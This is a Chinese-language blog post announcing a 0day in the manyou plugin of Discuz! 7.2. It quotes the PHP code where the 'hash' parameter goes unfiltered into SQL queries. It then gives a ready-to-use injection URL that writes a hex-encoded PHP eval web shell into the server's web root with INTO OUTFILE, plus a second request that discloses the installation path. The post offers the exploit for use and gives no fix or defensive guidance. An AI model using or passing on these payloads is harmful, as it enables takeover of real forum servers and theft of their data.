discuz! 7.2 manyou插件暴路徑&Get Webshell 0day

在最新的discuz! 7.2中自帶了一個新的應用程序插件manyou。恰恰在這個新插件中,沒有對傳入的參數進行檢查,在GPC爲off的情況下,導致注入漏洞的產生。
漏洞分析:
文件./manyou/sources/notice.php
相關代碼:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']);    //此處並沒有進行過濾,直接導致注入的產生
if($action == 'invite') {  
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很簡單的一個漏洞。在沒有查詢結果返回的情況下我們往往只有採取盲注的方式,但如果當前數據庫帳號有File_priv的話我們也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

/manyou/admincp.php?my_suffix=%0A%0DTOBY57    爆路徑

 
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章